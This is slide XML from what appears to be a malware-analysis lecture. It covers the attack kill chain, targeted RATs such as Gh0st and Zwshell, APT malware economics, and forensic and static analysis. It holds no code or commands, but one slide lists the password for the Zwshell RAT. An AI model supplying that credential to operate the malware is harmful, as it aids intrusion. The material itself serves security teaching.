            <a:ln w="12700">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="45720" rIns="0" bIns="18288" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Step 4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="Group 38"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4109911" y="1742515"/>
              <a:ext cx="1321358" cy="2045260"/>
              <a:chOff x="4123627" y="1742515"/>
              <a:chExt cx="1321358" cy="2045260"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="Straight Connector 39"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="4784306" y="1993900"/>
                <a:ext cx="0" cy="1019176"/>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329388" y="1987550"/>
                <a:ext cx="909836" cy="0"/>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123627" y="1742515"/>
                <a:ext cx="1321358" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Exploitation</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 42"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4396956" y="3013075"/>
                <a:ext cx="774700" cy="774700"/>
                <a:chOff x="4393435" y="3013075"/>
                <a:chExt cx="774700" cy="774700"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Oval 43"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4393435" y="3013075"/>
                  <a:ext cx="774700" cy="774700"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">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4197" y="3117648"/>
                  <a:ext cx="569877" cy="566077"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Group 45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3137994" y="1349182"/>
            <a:ext cx="1013382" cy="1857207"/>
            <a:chOff x="3137994" y="2159680"/>
            <a:chExt cx="1013382" cy="1857207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3301262" y="3767588"/>
              <a:ext cx="686846" cy="249299"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="45720" rIns="0" bIns="18288" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Step 3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3137994" y="2159680"/>
              <a:ext cx="1013382" cy="1628095"/>
              <a:chOff x="3169998" y="2159680"/>
              <a:chExt cx="1013382" cy="1628095"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="49" name="Straight Connector 48"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="3673514" y="2419350"/>
                <a:ext cx="6350" cy="593725"/>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317914" y="2413000"/>
                <a:ext cx="717550" cy="0"/>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169998" y="2159680"/>
                <a:ext cx="1013382" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Delivery</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="52" name="Group 51"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3289339" y="3013075"/>
                <a:ext cx="774700" cy="774700"/>
                <a:chOff x="3300070" y="3013075"/>
                <a:chExt cx="774700" cy="774700"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="53" name="Oval 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3300070" y="3013075"/>
                  <a:ext cx="774700" cy="774700"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">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99047" y="3238110"/>
                  <a:ext cx="599008" cy="329935"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
              </p:spPr>
            </p:pic>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="Group 54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5976446" y="932017"/>
            <a:ext cx="1968963" cy="2274372"/>
            <a:chOff x="5976446" y="1742515"/>
            <a:chExt cx="1968963" cy="2274372"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="TextBox 55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6588280" y="3767588"/>
              <a:ext cx="745294" cy="249299"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="45720" rIns="0" bIns="18288" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Step 6</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="Group 56"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5976446" y="1742515"/>
              <a:ext cx="1968963" cy="2045260"/>
              <a:chOff x="5976446" y="1742515"/>
              <a:chExt cx="1968963" cy="2045260"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="58" name="Straight Connector 57"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="6960927" y="1980184"/>
                <a:ext cx="0" cy="1019176"/>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059227" y="1987550"/>
                <a:ext cx="1803400" cy="0"/>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976446" y="1742515"/>
                <a:ext cx="1968963" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Command and Control</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="61" name="Oval 60"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6573577" y="3013075"/>
                <a:ext cx="774700" cy="774700"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">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62" name="Picture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67838" y="3082355"/>
                <a:ext cx="386178" cy="626234"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="Group 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7088026" y="1349182"/>
            <a:ext cx="1946246" cy="1857207"/>
            <a:chOff x="7088026" y="1380355"/>
            <a:chExt cx="1946246" cy="1857207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="TextBox 63"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7088026" y="1380355"/>
              <a:ext cx="1946246" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Actions on Objectives</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="65" name="Group 64"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7194374" y="1633675"/>
              <a:ext cx="1733550" cy="1603887"/>
              <a:chOff x="7194374" y="2413000"/>
              <a:chExt cx="1733550" cy="1603887"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66" name="TextBox 65"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7688502" y="3767588"/>
                <a:ext cx="745294" cy="249299"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="12700">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="45720" rIns="0" bIns="18288" rtlCol="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Step 7</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="67" name="Group 66"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7194374" y="2413000"/>
                <a:ext cx="1733550" cy="1374775"/>
                <a:chOff x="7194374" y="2413000"/>
                <a:chExt cx="1733550" cy="1374775"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="68" name="Straight Connector 67"/>
                <p:cNvCxnSpPr/>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="8057974" y="2419350"/>
                  <a:ext cx="6350" cy="593725"/>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194374" y="2413000"/>
                  <a:ext cx="1733550" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="12700" cap="rnd">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7673799" y="3013075"/>
                  <a:ext cx="774700" cy="774700"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="254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71" name="Picture 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28913" y="3154681"/>
                  <a:ext cx="464472" cy="474114"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41090142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atin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Custom/Targeted Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Chinese Gh0st RAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295401" y="1714500"/>
            <a:ext cx="6555253" cy="285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74083245"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/mai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z="3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Malware Economy - APT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" i="1">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>RAT used: Zwshell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Pwd: zw.china</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="358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0"/>
            <a:ext cx="516890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JL-RECHTS 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="2914650"/>
            <a:ext cx="1219200" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C000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buFont typeface="Times New Roman" pitchFamily="16" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408708639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z="3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Malware Economy - APT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="0" i="1">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Hidden menu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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714" y="1485900"/>
            <a:ext cx="4383087" cy="339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934081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forensic analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What is forensic analysis?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Contextual metadata leading researcher to this point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Customer submission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Anecdotal details about attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Honeypot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Association with other threats</a:t>
            </a:r>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399" y="1047750"/>
            <a:ext cx="4955848" cy="3447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4915" y="1047750"/>
            <a:ext cx="5532885" cy="3461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AsproxWalmart resized 6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558771"/>
            <a:ext cx="5795765" cy="295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124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static analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
